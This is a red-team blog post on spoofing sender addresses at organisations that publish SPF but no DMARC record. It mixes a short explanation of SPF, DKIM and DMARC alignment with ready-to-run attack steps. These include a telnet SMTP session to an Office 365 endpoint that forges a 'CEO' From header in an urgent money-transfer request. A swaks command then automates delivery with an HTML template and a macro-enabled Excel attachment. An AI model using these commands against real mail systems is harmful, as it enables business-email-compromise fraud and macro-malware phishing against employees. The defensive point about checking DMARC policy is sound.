Long Live DMARC - Email Spoof issues
Spoof emails when SPF is present but DMARC is not allowing you to spoof the sender
Email Spoof Attack Components
Recently, during my research, I came across an organization that was using O365 for emails. While, during the initial recon, I skipped over the fact that they didn't have a DMARC, it clicked me when I was reading over my notes.
Background Info:
Email Provider : O365
SPF: Exists (v=spf1 ip4:192.168.0.0/24 -all)
DMARC: Do not exist
If you don't like nslookup commands, you can check this on MXtoolbox as well
DMARC of the domain doesn't exist
TIP: If it exists check if p=None is set. p=none means DMARC policy of reject or quarantine isn't enforced
Technical Background
An email consists of two parts an SMTP envelope and Message data. Below is a pictorial representation
Breakdown of two parts of an email
SPF verifies HELO/EHLO
DKIM: Verify the DKIM-signature of the sender
DMARC: checks alignment between 'From' and 'Mail From'
SPF and DKIM verification fields
In Conclusion, if DMARC isn't present, there is no way to verify the alignment between the 'MAIL FROM' and 'FROM' fields. If the receiving user only sees 'FROM' then an attacker is free to forge anything. Simply put, an attacker can put any email address he likes in the 'FROM' field and the receiving user will see that the email is coming from the forged 'FROM' address.
Current Exploitation Methods:
Quick guides I found on exploiting DMARC not present issue also known as "SPF-BYPASS" are as follows
Info Extract from above methods
Info Extract from the above methods
So to spoof following actions must be performed
Step 1: Buy a domain or configure a subdomain (I'll be using a subdomain: fook.redteam.cafe)
Step 2: Get a VPS that allows SMTP. I'm using DigitalOcean.
Step 3: Set the right SPF record on the domain. Example v=spf1 mx a ip4:<Digital OCEAN IP> -all
Step 4: connect via telnet to the target SMTP server. My target org used office365 so we'll telnet to orgname-com.mail.protection.outlook.com
telnet orgname-com.mail.protection.outlook.com 25
Step 5: Perform actions as below
ehlo fook.redteam.cafe
MAIL FROM: [email protected]
RCPT To: [email protected]
data
from: "CEO ORG" <[email protected]>
to: <[email protected]>
subject: transfer money urgently
Hey send me money at bank account 123456789
.
Enjoy the profit
Missing Automation 🤷♂️
So all this is good and everything, but where the hell is automation. As a red teamer, I asked myself these questions
- 1.Where is automation? Do I send an email by telnet to all my victims? That's boring
- 2.How do I send an HTML email?
- 3.How do I send an attachment with my email?
After looking at many telnet automation, I was frustrated. I decided to use SWAKS, the Swiss Army knife for emails.
Instead of doing loads of telnet, manual encoding of messages, lets run this sweet command and be done
./swaks --ehlo fook.redteam.cafe --from [email protected] --to [email protected] --server orgname-com.mail.protection.outlook.com --h-From '"CEO ORG" <[email protected]>' --attach-type text/html --attach-body @Mail-Template.html --attach macroexcel.xlsm --attach-type text/html
Is this something new ?
Probaby not, You must have heard about this 100 years ago.
How can I find more issues in the email delivery system?
Well, there is of course the manual way to
dig for SPF, DMARC and DKIM. You can also just go to caniphish.com for a quicker way in. Super Useful Research
While doing some google-fu, I found two very useful projects to test mail delivery systems.
These projects will help you discover issues in mail delivery systems. You may even get a 0 day in your pocket 🤷♂️ if you choose the right target. Shhhhh
References:
Amazing Blackhat Talk
Last modified 9mo ago